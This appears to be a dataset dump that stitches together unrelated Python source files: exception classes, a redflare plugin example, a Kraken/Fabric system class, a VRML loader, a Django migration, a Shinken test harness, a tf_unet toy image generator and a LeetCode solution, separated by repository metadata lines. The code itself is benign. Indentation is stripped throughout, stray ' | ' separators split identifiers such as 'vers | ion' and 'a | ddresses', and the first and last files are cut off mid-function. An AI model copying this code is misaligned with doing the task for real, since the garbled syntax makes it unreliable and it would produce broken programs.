self.details = 'The tier name looked for (ignoring case) was \'{}\'.\n'.format(tier_name)
self.details += 'The following tiers were found:\n\n'
for t in tiers:
self.details += '{}\n'.format(t.name)
class BuckeyeParseError(ParseError):
"""
Exception class for parsing Buckeye formatted files
"""
def __init__(self, path, misparsed_lines):
if len(misparsed_lines) == 1:
self.main = 'One line in \'{}\' was not parsed correctly.'.format(path)
else:
self.main = '{} lines in \'{}\' were not parsed correctly.'.format(len(misparsed_lines), path)
self.information = 'The lines did not have enough fields to be parsed correctly.'
self.details = 'The following lines were missing entries:\n\n'
for t in misparsed_lines:
self.details += '{}\n'.format(t)
self.value = '\n'.join([self.main, self.details])
# Acoustic exceptions
class AcousticError(PGError):
"""
Exception class for errors in acoustic processing
"""
pass
class NoSoundFileError(AcousticError):
"""
Exception class for when no sound file exists
"""
pass
class GraphQueryError(PGError):
"""
Exception class for errors in querying the Neo4j database
"""
pass
class CorpusConfigError(PGError):
"""
Exception class for misconfigured CorpusContext objects
"""
pass
class SubannotationError(PGError):
"""
Exception class for subannotations
"""
pass
class GraphModelError(PGError):
"""
Exception class for generating Python objects from Neo4j queries
"""
pass
class ConnectionError(PGError):
"""
Exception class for connection failures
"""
pass
class AuthorizationError(PGError):
"""
Exception class for authentication failures
"""
pass
class NetworkAddressError(PGError):
"""
Exception class for malformed network a | ddresses
"""
pass
class TemporaryConnectionError( | PGError):
"""
Exception class for transient connection errors
"""
pass
class SubsetError(PGError):
"""
Exception class for not finding a specified subset
"""
pass
class HierarchyError(PGError):
"""
Exception class for Hierarchy errors
"""
pass
class ClientError(PGError):
"""
Exception class for connecting to remote/local ISCAN servers
"""
pass
class NodeAttributeError(GraphQueryError):
"""
Exception class for errors in attributes for base nodes in constructing queries
"""
pass
class SpeakerAttributeError(NodeAttributeError):
"""
Exception class for errors in attributes for speakers in constructing queries
"""
pass
class DiscourseAttributeError(NodeAttributeError):
"""
Exception class for errors in attributes for discourses in constructing queries
"""
pass
class AnnotationAttributeError(NodeAttributeError):
"""
Exception class for errors in attributes for annotations in constructing queries
"""
pass
class LexiconAttributeError(NodeAttributeError):
"""
Exception class for errors in attributes for type annotations in constructing queries
"""
pass
|
stupidnetizen/redflare | redflare/plugins/example/example.py | Python | gpl-3.0 | 5,659 | 0.014667 | """This is an example plugin for redflare."""
"""
This is a simple plugin to add some basic functionality.
"""
import sys, os
from pkg_resources import get_distribution
import logging
from cement import namespaces
from cement.core.log import get_logger
from cement.core.opt import init_parser
from cement.core.hook import define_hook, register_hook
from cement.core.command import CementCommand, register_command
from cement.core.plugin import CementPlugin, register_plugin
log = get_logger(__name__)
VERSION = '0.1'
REQUIRED_CEMENT_ABI = '20091211'
# Optional: Allows you to customize the output of --version
BANNER = """
redflare.plugins.example v%s
""" % (VERSION)
@register_plugin()
class ExamplePlugin(CementPlugin):
def __init__(self):
CementPlugin.__init__(self,
label = 'example',
vers | ion = VERSION,
description = 'Example plugin for redflare | ',
required_abi = REQUIRED_CEMENT_ABI,
version_banner=BANNER,
)
# plugin configurations can be setup this way
self.config['example_option'] = False
# plugin cli options can be setup this way. Generally, cli options
# are used to set config options... so if you probably want to
# add your options to both.
self.options.add_option('-E', '--example', action='store',
dest='example_option', default=None, help='Example Plugin Option'
)
@register_hook()
def options_hook(*args, **kwargs):
"""
Use this hook to add options to other namespaces. An OptParse object is
expected on return, and any options will be merged into the global options.
Global options can also be used as local options by setting the config
option 'merge_global_options = true' in the plugin config.
"""
global_options = init_parser()
global_options.add_option('-G', '--global-option', action ='store_true',
dest='global_option', default=None, help='Example Global option'
)
# return the namespace and the global options to add.
return ('global', global_options)
@register_hook()
def options_hook(*args, **kwargs):
"""
We can also use the options hook to tie into other plugins, or even our
own. This is an alternateway of adding options for your [or other]
plugins.
"""
my_options = init_parser()
my_options.add_option('--new-local', action ='store',
dest='newlocal_option', default=None, help='Example Local option'
)
# return the namespace and the global options to add.
return ('example', my_options)
@register_hook()
def post_options_hook(*args, **kwargs):
"""
Use this hook if any operations need to be performed if a global
option is passed. Notice that we set a global option of -G in our
global_options_hook above. Here we can access that value from the
global namespace configuration.
"""
cnf = namespaces['global'].config
if cnf.has_key('global_option'):
print "global_option => %s", cnf['global_option']
# then do something with it
@register_command(name='ex1', namespace='example')
class ex1Command(CementCommand):
"""
This is how to add a local/plugin subcommand because it will be
under the 'example' namespace. You would access this subcommand as:
$ myapp example ex1
"""
def run(self):
print "This is Example1Command.run()"
def help(self):
print "This is Example1Command.help()"
@register_command(name='ex2', namespace='global')
class ex2Command(CementCommand):
def run(self):
"""
This is an example global command. See --help. When commands are
called, they are passed the cli options and args passed after it.
These are then forwarded onto the command class where they can be
called as self.cli_args, and self.cli_opts.
Notice that you can specify the namespace via the decorator parameters.
If a plugin has any non-global commands they are grouped under a
single command to the base cli application. For example, you will
see global commands and namespaces* when you execute:
myapp --help
For example, if 'myplugin' has local commands, you will
see 'myplugin*' show up in the global commands list, and then the
plugin subcommands will be seen under:
myapp myplugin --help
This is done to give different options in how your application works.
"""
print "This is Example2Command.run()."
# you can then see if options where passed:
if self.cli_opts.global_option:
print "You passed --global-options!"
def help(self):
"""
All commands have a hidden -help option as well. Here you can
provide examples or other helpful information.
"""
print "This is Example2Command.help()"
@register_command(name='ex3', namespace='redflare_core')
class ex3Command(CementCommand):
"""
This is how to add a local/plugin subcommand to another namespace. It
is possible to use this in conjunction with the options_hook() to add
additional functionality to a completely other namespace:
$ myapp redflare ex3
"""
def run(self):
print "This is Example3Command.run()"
def help(self):
print "This is Example3Command.help()"
|
oculusstorystudio/kraken | Python/kraken/core/kraken_system.py | Python | bsd-3-clause | 13,241 | 0.002643 | """KrakenSystem - objects.kraken_core module.
Classes:
KrakenSystem - Class for constructing the Fabric Engine Core client.
"""
import logging
import os
import sys
import json
import importlib
from collections import OrderedDict
import FabricEngine.Core
# import kraken
from kraken.core.profiler import Profiler
from kraken.plugins import getFabricC | lient
from kraken.log import getLogger
from kraken.log.utils import fabricCallback
logger = getLogger('kraken')
class KrakenSystem(object):
"""The KrakenSystem is a singleton object used to provide an interface with
the FabricEngine Core and RTVal system."""
__instance = None
def __init__(s | elf):
"""Initializes the Kraken System object."""
super(KrakenSystem, self).__init__()
self.client = None
self.typeDescs = None
self.registeredTypes = None
self.loadedExtensions = []
self.registeredConfigs = OrderedDict()
self.registeredComponents = OrderedDict()
# self.moduleImportManager = ModuleImportManager()
def loadCoreClient(self):
"""Loads the Fabric Engine Core Client"""
if self.client is None:
Profiler.getInstance().push("loadCoreClient")
client = getFabricClient()
if client is None:
options = {
'reportCallback': fabricCallback,
'guarded': True
}
client = FabricEngine.Core.createClient(options)
self.client = client
self.loadExtension('Math')
self.loadExtension('Kraken')
self.loadExtension('KrakenForCanvas')
Profiler.getInstance().pop()
def getCoreClient(self):
"""Returns the Fabric Engine Core Client owned by the KrakenSystem
Returns:
object: The Fabric Engine Core Client
"""
if self.client is None:
self.loadCoreClient()
return self.client
def loadExtension(self, extension):
"""Loads the given extension and updates the registeredTypes cache.
Args:
extension (str): The name of the extension to load.
"""
if extension not in self.loadedExtensions:
Profiler.getInstance().push("loadExtension:" + extension)
self.client.loadExtension(extension)
self.registeredTypes = self.client.RT.types
self.typeDescs = self.client.RT.getRegisteredTypes()
# Cache the loaded extension so that we aviod refreshing the typeDescs cache(costly)
self.loadedExtensions.append(extension)
Profiler.getInstance().pop()
# ==============
# RTVal Methods
# ==============
def convertFromRTVal(self, target, RTTypeName=None):
"""Generates an RTVal object based on the simple type of target
and passes target to constructor. Converts a property of an RTVal object
to its own pytholn RTVal object
Args:
target (RTVal): The RTVal object or property to cast
RTTypeName (str): The type of RTVal to convert to
Returns:
RTVal: The RTVal object
"""
self.loadCoreClient()
if RTTypeName is None:
RTTypeName = target.type('String').getSimpleType()
rtValType = getattr(self.client.RT.types, RTTypeName)
pythonRTVal = rtValType(target)
return pythonRTVal
def constructRTVal(self, dataType, defaultValue=None):
"""Constructs a new RTVal using the given name and optional devault value.
Args:
dataType (str): The name of the data type to construct.
defaultValue (value): The default value to use to initialize the RTVal
Returns:
object: The constructed RTval.
"""
self.loadCoreClient()
klType = getattr(self.registeredTypes, dataType)
if defaultValue is not None:
if hasattr(defaultValue, '_rtval'):
return defaultValue._rtval
typeDesc = self.typeDescs[dataType]
if 'members' in typeDesc:
try:
value = klType.create()
except:
try:
return klType()
except Exception as e:
raise Exception("Error constructing RTVal:" + dataType)
for i in xrange(0, len(typeDesc['members'])):
memberName = typeDesc['members'][i]['name']
memberType = typeDesc['members'][i]['type']
if memberName in defaultValue:
setattr(value, memberName, self.constructRTVal(memberType, getattr(defaultValue, memberName)))
return value
else:
return klType(defaultValue)
else:
try:
return klType.create()
except:
try:
return klType()
except Exception as e:
raise Exception("Error constructing RTVal:" + dataType)
def rtVal(self, dataType, defaultValue=None):
"""Constructs a new RTVal using the given name and optional devault value.
Args:
dataType (str): The name of the data type to construct.
defaultValue (value): The default value to use to initialize the RTVal
Returns:
object: The constructed RTval.
"""
return self.constructRTVal(dataType, defaultValue)
def isRTVal(self, value):
"""Returns true if the given value is an RTVal.
Args:
value (value): value to test.
Returns:
bool: True if successful.
"""
return str(type(value)) == "<type 'PyRTValObject'>"
def getRTValTypeName(self, rtval):
"""Returns the name of the type, handling extracting the name from KL RTVals.
Args:
rtval (rtval): The rtval to extract the name from.
Returns:
bool: True if successful.
"""
if ks.isRTVal(rtval):
return json.loads(rtval.type("Type").jsonDesc("String").getSimpleType())['name']
else:
return "None"
# ==================
# Config Methods
# ==================
def registerConfig(self, configClass):
"""Registers a config Python class with the KrakenSystem so ti can be built by the rig builder.
Args:
configClass (str): The Python class of the config
"""
configModulePath = configClass.__module__ + "." + configClass.__name__
self.registeredConfigs[configModulePath] = configClass
def getConfigClass(self, className):
"""Returns the registered Python config class with the given name
Args:
className (str): The name of the Python config class
Returns:
object: The Python config class
"""
if className not in self.registeredConfigs:
raise Exception("Config with that class not registered:" + className)
return self.registeredConfigs[className]
def getConfigClassNames(self):
"""Returns the names of the registered Python config classes
Returns:
list: The array of config class names.
"""
return self.registeredConfigs.keys()
# ==================
# Component Methods
# ==================
def registerComponent(self, componentClass):
"""Registers a component Python class with the KrakenSystem so ti can be built by the rig builder.
Args:
componentClass (str): The Python class of the component
"""
componentClassPath = componentClass.__module__ + "." + componentClass.__name__
if componentClassPath in self.registeredComponents:
# we allow reregistring of components because as a component's class is edited
# it will be re-imported by python(in Maya), and the classes reregistered.
pass
self.registeredComponents[componentClassPath] = componentClass
def g |
jlisee/xpkg | python/xpkg/paths.py | Python | bsd-3-clause | 381 | 0 | # Author: Joseph Lisee <jlisee@gmail.com>
__doc__ = """
Functions to return common xpkg paths.
"""
# Python Imports
import os
def ld_linux_path(root):
"""
Returns the path to our major ld-so syml | ink. (Which allows us to change
which ld-so we are actively using without patching | a bunch of binaries)
"""
return os.path.join(root, 'lib', 'ld-linux-xpkg.so')
|
plotly/python-api | packages/python/plotly/plotly/validators/isosurface/caps/_x.py | Python | mit | 1,178 | 0.000849 | import _plotly_utils.basevalidators
class XValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="x", parent_name="isosurface.caps", **kwargs):
super(XValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "X"),
data_docs=kwargs.pop(
"data_docs",
"""
fill
Sets the fill ratio of the `ca | ps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill r | atio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
""",
),
**kwargs
)
|
timvandermeij/mobile-radio-tomography | environment/VRML_Loader.py | Python | gpl-3.0 | 4,378 | 0.001827 | import os
import numpy as np
from vrml.vrml97 import basenodes, nodetypes, parser, parseprocessor
class VRML_Loader(object):
"""
Parser for VRML files. The VRML language is described in its specification
at http://www.web3d.org/documents/specifications/14772/V2.0/index.html
"""
def __init__(self, environment, filename, translation=None, transform=None):
self.environment = environment
self.filename = filename
if translation is None:
translation = (0.0, 0.0, 0.0)
elif len(translation) != 3:
raise ValueError("Translation must be a 3-component offset")
self.translation = tuple(translation)
self._transform = transform
vrml_parser = parser.Parser(parser.grammar, "vrmlFile")
processor = parseprocessor.ParseProcessor(baseURI=self.filename)
with open(self.filename, 'r') as f:
data = f.read()
self._scene = vrml_parser.parse(data, processor=processor)[1][1]
self._objects = None
def get_objects(self):
"""
Retrieve the objects from the VRML scene file.
The objects are provided as a list of lists of lists, where the deepest
nested lists are faces describing a polygon using point locations. Each
element of the list can therefore have multiple faces.
"""
if self._objects is None:
self._objects = []
self._parse_children(self._scene, self._transform)
return self._objects
def _parse_children(self, group, transform=None):
for child in group.children:
if isinstance(child, basenodes.Inline):
# Include the objects from the referenced file into the scene.
path = os.path.join(os.path.dirname(self.filename),
child.url[0])
loader = VRML_Loader(self.environment, path,
translation=self.translation,
transform=transform)
self._objects.extend(loader.get_objects())
elif isinstance(child, basenodes.Transform):
# Jumble up transformation matrices, in case they are nested.
forward = child.localMatrices().data[0]
if forward is not None:
if transform is not None:
new_transform = np.dot(transform, forward)
else:
new_transform = forward
else:
new_transform = transform
self._parse_children(child, new_transform)
elif isinstance(child, nodetypes.Grouping):
# Retrieve children from grouped nodes.
self._parse_children(child, transform)
elif isinstance(child, basenodes.Shape):
# Parse the coordinates from a shape's geometry.
self._parse_geometry(child.geometry, transform)
def _parse_geometry(self, geometry, transform=None):
faces = []
face = []
for i in geometry.coordIndex:
if i == -1:
faces.append(face)
face = []
else:
point = geometry.coord.point[i]
if transform is not None:
# The translation matrices from the VRML library are for
# affine translations, but they are transposed for some
| # reason. See vrml.vrml97.transformmatrix, e.g. line 319.
point = np.dot(transform.T, np.append(point, 1).T)
# Convert to Location
# VRML geometry notation is in (x,z,y) where y is the vertical
# axis (using GL notation here | ). We have to convert it to
# (z,x,y) since the z/x are related to distances on the ground
# in north and east directions, respectively, and y is still
# the altitude.
north = point[1] + self.translation[0]
east = point[0] - self.translation[1]
alt = point[2] + self.translation[2]
loc = self.environment.get_location(north, east, alt)
face.append(loc)
if len(face) > 0:
faces.append(face)
self._objects.append(faces)
|
sevein/archivematica | src/dashboard/src/main/migrations/0007_django_upgrade_tweaks.py | Python | agpl-3.0 | 4,909 | 0.003056 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0006_levelofdescription'),
]
operations = [
migrations.AlterField(
model_name='agent',
name='identifiertype',
field=models.TextField(null=True, verbose_name=b'Agent Identifier Type', db_column=b'agentIdentifierType'),
preserve_default=True,
),
migrations.AlterField(
model_name='agent',
name='identifiervalue',
field=models.TextField(help_text=b'Used for premis:agentIden | tifierValue and premis:linkingAgentIdentifierValue in the METS file.', null=True, verbose_name=b'Agent Identifier Value', db_column=b'agentIdentifierValue'),
preserve_default=Tru | e,
),
migrations.AlterField(
model_name='agent',
name='name',
field=models.TextField(help_text=b'Used for premis:agentName in the METS file.', null=True, verbose_name=b'Agent Name', db_column=b'agentName'),
preserve_default=True,
),
migrations.AlterField(
model_name='microservicechainlink',
name='defaultnextchainlink',
field=models.ForeignKey(db_column=b'defaultNextChainLink', blank=True, to='main.MicroServiceChainLink', null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='microservicechainlink',
name='replaces',
field=models.ForeignKey(related_name='replaced_by', db_column=b'replaces', blank=True, to='main.MicroServiceChainLink', null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='microservicechoicereplacementdic',
name='lastmodified',
field=models.DateTimeField(auto_now=True, db_column=b'lastModified'),
preserve_default=True,
),
migrations.AlterField(
model_name='rightsstatementcopyright',
name='copyrightenddateopen',
field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'copyrightApplicableEndDateOpen'),
preserve_default=True,
),
migrations.AlterField(
model_name='rightsstatementlicense',
name='licenseenddateopen',
field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'licenseApplicableEndDateOpen'),
preserve_default=True,
),
migrations.AlterField(
model_name='rightsstatementotherrightsinformation',
name='otherrightsenddateopen',
field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'otherRightsApplicableEndDateOpen'),
preserve_default=True,
),
migrations.AlterField(
model_name='rightsstatementrightsgranted',
name='enddateopen',
field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'endDateOpen'),
preserve_default=True,
),
migrations.AlterField(
model_name='rightsstatementstatuteinformation',
name='statuteenddateopen',
field=models.BooleanField(default=False, help_text=b'Indicate end date is open', verbose_name=b'Open End Date', db_column=b'statuteApplicableEndDateOpen'),
preserve_default=True,
),
migrations.AlterField(
model_name='dublincore',
name='date',
field=models.TextField(help_text=b'Use ISO 8601 (YYYY-MM-DD or YYYY-MM-DD/YYYY-MM-DD)', db_column=b'date', blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='microservicechain',
name='replaces',
field=models.ForeignKey(related_name='replaced_by', db_column=b'replaces', blank=True, to='main.MicroServiceChain', null=True),
preserve_default=True,
),
migrations.AlterField(
model_name='rightsstatementrightsgrantednote',
name='rightsgranted',
field=models.ForeignKey(related_name='notes', db_column=b'fkRightsStatementRightsGranted', to='main.RightsStatementRightsGranted'),
preserve_default=True,
),
migrations.AlterField(
model_name='rightsstatementrightsgrantedrestriction',
name='rightsgranted',
field=models.ForeignKey(related_name='restrictions', db_column=b'fkRightsStatementRightsGranted', to='main.RightsStatementRightsGranted'),
preserve_default=True,
),
]
|
h4wkmoon/shinken | test/shinken_test.py | Python | agpl-3.0 | 14,045 | 0.002563 | #!/usr/bin/env python
#
# This file is used to test host- and service-downtimes.
#
import sys
import time
import datetime
import os
import string
import re
import random
import unittest
import copy
# import the shinken library from the parent directory
import __import_shinken ; del __import_shinken
import shinken
from shinken.objects.config import Config
from shinken.objects.command import Command
from shinken.objects.module import Module
from shinken.dispatcher import Dispatcher
from shinken.log import logger
from shinken.modulesctx import modulesctx
from shinken.scheduler import Scheduler
from shinken.macroresolver import MacroResolver
from shinken.external_command import ExternalCommandManager, ExternalCommand
from shinken.check import Check
from shinken.message import Message
from shinken.arbiterlink import ArbiterLink
from shinken.schedulerlink import SchedulerLink
from shinken.pollerlink import PollerLink
from shinken.reactionnerlink import ReactionnerLink
from shinken.brokerlink import BrokerLink
from shinken.satellitelink import SatelliteLink
from shinken.notification import Notification
from shinken.modulesmanager import ModulesManager
from shinken.basemodule import BaseModule
from shinken.brok import Brok
from shinken.daemons.schedulerdaemon import Shinken
from shinken.daemons.brokerdaemon import Broker
from shinken.daemons.arbiterdaemon import Arbiter
from shinken.daemons.receiverdaemon import Receiver
from logging import ERROR
# Modules are by default on the ../modules
myself = os.path.abspath(__file__)
global modules_dir
modules_dir = "modules"
def define_modules_dir(val):
global modules_dir
modules_dir = val
class __DUMMY:
def add(self, obj):
pass
logger.load_obj(__DUMMY())
logger.setLevel(ERROR)
# We overwrite the functions time() and sleep()
# This way we can modify sleep() so that it immediately returns although
# for a following time() it looks like thee was actually a delay.
# This massively speeds up the tests.
class TimeHacker(object):
def __init__(self):
self.my_offset = 0
self.my_starttime = time.time()
self.my_oldtime = time.time
self.original_time_time = time.time
self.original_time_sleep = time.sleep
self.in_real_time = True
def my_time_time(self):
return self.my_oldtime() + self.my_offset
def my_time_sleep(self, delay):
self.my_offset += delay
def time_warp(self, duration):
self.my_offset += duration
def set_my_time(self):
if self.in_real_time:
time.time = self.my_time_time
time.sleep = self.my_time_sleep
self.in_real_time = False
# If external processes or time stamps for files are involved, we must
# revert the fake timing routines, because these externals cannot be fooled.
# They get their times from the operating system.
def set_real_time(self):
if not self.in_real_time:
time.time = self.original_time_time
time.sleep = self.original_time_sleep
self.in_real_time = True
#Time hacking for every test!
time_hacker = TimeHacker()
time_hacker.set_my_time()
class Pluginconf(object):
pass
class _Unittest2CompatMixIn:
"""
Mixin for simulating methods new in unittest2 resp. Python 2.7.
Every test-case should inherit this *after* unittest.TestCase to
make the compatiblity-methods available if they are not defined in
unittest.TestCase already. Example::
class MyTestCase(unittest.TestCase, Unittest2CompatMixIn):
...
In our case, it's better to always inherit from ShinkenTest
"""
def assertNotIn(self, member, container, msg=None):
self.assertTrue(member not in container)
def assertIn(self, member, container, msg=None):
self.assertTrue(member in container)
def assertIsInstance(self, obj, cls, msg=None):
self.assertTrue(isinstance(obj, cls))
def assertRegexpMatches(self, line, pattern):
r = re.search(pattern, line)
self.assertTrue(r is not None)
def assertIs(self, obj, cmp, msg=None):
self.assertTrue(obj is cmp)
class ShinkenTest(unittest.TestCase, _Unittest2CompatMixIn):
def setUp(self):
self.setup_with_file('etc/shinken_1r_1h_1s.cfg')
def setup_with_file(self, path):
time_hacker.set_my_time()
self.print_header()
# i am arbiter-like
self.broks = {}
self.me = None
self.log = logger
self.log.load_obj(self)
self.config_files = [path]
self.conf = Config()
buf = self.conf.read_config(self.config_files)
raw_objects = self.conf.read_config_buf(buf)
self.conf.create_objects_for_type(raw_objects, 'arbiter')
self.conf.create_objects_for_type(raw_objects, 'module')
self.conf.early_arbiter_linking()
self.conf.create_objects(raw_objects)
self.conf.old_properties_names_to_new()
self.conf.instance_id = 0
self.conf.instance_name = 'test'
# Hack push_flavor, that is set by the dispatcher
self.conf.push_flavor = 0
self.conf.load_triggers()
self.conf.linkify_templates()
self.conf.apply_inheritance()
self.conf.explode()
#print "Aconf.services has %d elements" % len(self.conf.services)
self.conf.create_reversed_list()
self.conf.remove_twins()
self.conf.apply_implicit_inheritance()
self.conf.fill_default()
self.conf.remove_templates()
self.conf.compute_hash()
#print "conf.services has %d elements" % len(self.conf.services)
self.conf.create_reversed_list()
self.conf.override_properties()
self.conf.pythonize()
count = self.conf.remove_exclusions()
if count > 0:
self.conf.create_reversed_list()
self.conf.linkify()
self.conf.apply_dependencies()
self.conf.explode_global_conf()
self.conf.propagate_timezone_option()
self.conf.create_business_rules()
self.conf.create_business_rules_dependencies()
self.conf.is_correct()
if not self.conf.conf_is_correct:
print "The conf is not correct, I stop here"
return
self.conf.clean()
self.confs = self.conf.cut_into_parts()
self.conf.prepare_for_sending()
self.conf.show_errors()
self.dispatcher = Dispatcher(self.conf, self.me)
scheddaemon = Shinken(None, False, False, False, None, None)
self.sched = Scheduler(scheddaemon)
scheddaemon.sched = self.sched
scheddaemon.modules_dir = modules_dir
scheddaemon.load_modules_manager()
# Remember to clean the logs we just created before launching tests
self.clear_logs()
m = MacroResolver()
m.init(self.conf)
self.sched.load_conf(self.conf, in_test=True)
e = ExternalCommandManager(self.conf, 'applyer')
self.sched.external_command = e
e.load_scheduler(self.sched)
e2 = ExternalCommandManager(self.conf, 'dispatcher')
e2.load_arbiter(self)
self.external_command_dispatcher = e2
self.sched.conf.accept_passive_unknown_check_results = False
self.sched.schedule()
def add(self, b):
if isinstance(b, Brok):
self.broks[b.id] = b
return
| if isinstance(b, ExternalCommand):
self.sched.run_external_command(b.cmd_line)
def fake_check(self, ref, exit_status, output="OK"):
#print "fake", ref
now = time.time()
ref.schedule(force=True)
# now checks are schedule and we get them in
# the action queue
#check = ref.actions.pop()
check = ref.checks_in_progress[0]
self.sched.add(check) # check is now in sched.checks[]
# Allo | ws to force check scheduling without setting its status nor
# output. Useful for manual business rules rescheduling, for instance.
if exit_status is None:
return
# fake execution
check.check_time = now
# and lie about when we will launch it because
|
mughanibu/Deep-Learning-for-Inverse-Problems | tf_unet/image_gen.py | Python | mit | 3,652 | 0.008215 | # tf_unet is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# tf_unet is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with tf_unet. If not, see <http://www.gnu.org/licenses/>.
'''
Toy example, generates images at random that can be used for training
Created on Jul 28, 2016
author: jakeret
'''
from __future__ import print_function, division, absolute_import, unicode_literals
import numpy as np
from tf_unet.image_util import BaseDataProvider
class GrayScaleDataProvider(BaseDataProvider):
channels = 1
n_class = 1
def __init__(self, nx, ny, **kwargs):
super(GrayScaleDataProvider, self).__init__()
self.nx = nx
self.ny = ny
self.kwargs = kwargs
rect = kwargs.get("rectangles", False)
if rect:
self.n_class=3
def _next_data(self):
image, label = create_image_and_label(self.nx, self.ny, **self.kwargs)
# print(image.shape)
# print(label.shape)
return image,label
# return create_image_and_label(self.nx, self.ny, **self.kwargs)
class RgbDataProvider(BaseDataProvider):
channels = 3
n_class = 2
def __init__(self, nx, ny, **kwargs):
super(RgbDataProvider, self).__init__()
self.nx = nx
self.ny = ny
self.kwargs = kwargs
rect = kwargs.get("rectangles", False)
if rect:
self.n_class=3
def _next_data(self):
data, label = create_image_and_label(self.nx, self.ny, **self.kwargs)
return to_rgb(data), label
def create_image_and_label(nx,ny, cnt = 2, r_min = 2, r_max = 8, border = 0, sigma = 1, rectangles=False):
image = np.ones((nx, ny, 1))
label = np.zeros((nx, ny, 3), dtype=np.float32)
mask = np.zeros((nx, ny), dtype=np.bool)
for _ in range(cnt):
a = np.random.randint(border, nx-border)
b = np.random.randint(border, ny-border)
r = np.random.randint(r_min, r_max)
h = np.random.randint(1,255)
y,x = np.ogrid[-a:nx-a, -b:ny-b]
m = x*x + y*y <= r*r
mask = np.logical_or(mask, m)
image[m] = h
# print(mask.shape)
label[mask, 1] = 1
if rectangles:
mask = np.zeros((nx, ny), dtype=np.bool)
for _ in range(cnt//2):
a = np.random.randint(nx)
b = np.random.randint(ny)
r = np.random.randint(r_min, r_max)
h = np.random.randint(1,255)
m = np.zeros((nx, ny), dtype=np.bool)
m[a:a+r, b:b+r] = True
mask = np.logical_or(mask, m)
image[m] = h
label[mask, 2] = 1
label[..., 0] = ~(np.logical_or(label[...,1], label[...,2]))
image += np.random.normal(scale=sigma, size=image.shape)
image -= np.amin(image)
image /= np.amax | (image)
if rectangles:
ret | urn image, label
else:
return image, label[..., 1]
def to_rgb(img):
img = img.reshape(img.shape[0], img.shape[1])
img[np.isnan(img)] = 0
img -= np.amin(img)
img /= np.amax(img)
blue = np.clip(4*(0.75-img), 0, 1)
red = np.clip(4*(img-0.25), 0, 1)
green= np.clip(44*np.fabs(img-0.5)-1., 0, 1)
rgb = np.stack((red, green, blue), axis=2)
return rgb
|
hofmeist/fabm-ihf | src/drivers/python/pyfabm/utils/fabm_describe_model.py | Python | gpl-2.0 | 1,910 | 0.019372 | #!/usr/bin/e | nv python
import sys
import argparse
try:
import pyfabm
except ImportError:
print 'Unable to load pyfabm. See https://github.com/fabm-model/code/wiki/python.'
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description='This script lists a | ll state variables, diagnostic variables, conserved quantities and environmental dependencies of a biogeochemical model.')
parser.add_argument('path',help='Path to a YAML file with the model configuration (typically fabm.yaml)',nargs='?',default='fabm.yaml')
args = parser.parse_args()
# Create model object from YAML file.
model = pyfabm.Model(args.path)
print 'Interior state variables:'
for variable in model.bulk_state_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Surface-attached state variables:'
for variable in model.surface_state_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Bottom-attached state variables:'
for variable in model.bottom_state_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Interior diagnostic variables:'
for variable in model.bulk_diagnostic_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Horizontal diagnostic variables:'
for variable in model.horizontal_diagnostic_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Conserved quantities:'
for variable in model.conserved_quantities:
print ' %s (%s)' % (variable.name,variable.units)
print 'Dependencies:'
for variable in model.dependencies:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
if __name__ == "__main__":
# execute only if run as a script
main()
|
qiyuangong/leetcode | python/087_Scramble_String.py | Python | mit | 3,034 | 0.002966 | class Solution(object):
#https://discuss.leetcode.com/topic/20094/my-c-solutions-recursion-with-cache-dp-recursion-with-cache-and-pruning-with-explanation-4ms/2
# def isScramble(self, s1, s2):
# """
# :type s1: str
# :type s2: str
# :rtype: bool
# """
# # recursive
# if s1 == s2:
# return True
# if len(s1) != len(s2):
# return False
# ls = len(s1)
# letters = [0] * 26
# for i in range(ls):
# letters[ord(s1[i]) - ord('a')] += 1
# letters[ord(s2[i]) - ord('a')] -= 1
# for i in range(26):
# if letters[i] != 0:
# return False
# for i in range(1, ls):
# if self.isScramble(s1[0:i], s2[0:i]) and self.isScramble(s1[i:], s2[i:]):
# return True
# if self.isScramble(s1[0:i], s2[ls - i:]) and self.isScramble(s1[i:], s2[:ls - i]):
# return True
# return False
def isScramble(self, s1, s2, memo={}):
# recursive with memo
# Check with sorted is fundamental, otherwise TLE
if len(s1) != len(s2) or sorted(s1) != sorted(s2):
return False
if len(s1) <= len(s2) <= 1:
return s1 == s2
| if s1 == s2:
return True
if (s1, s2) in memo:
return memo[s1, s2]
n = len(s1)
for i in range(1, n):
a = self.isScramble(s1[:i], s2[:i], memo) and self.isScramble(s1[i:], s2[i:], memo)
if not a:
b = self.isScramble(s1[:i], s2[-i:], memo) and self.isScramble(s1[i:], s2[:-i], memo)
if a or b:
memo[s1, | s2] = True
return True
memo[s1, s2] = False
return False
# def isScramble(self, s1, s2):
# # dp TLE
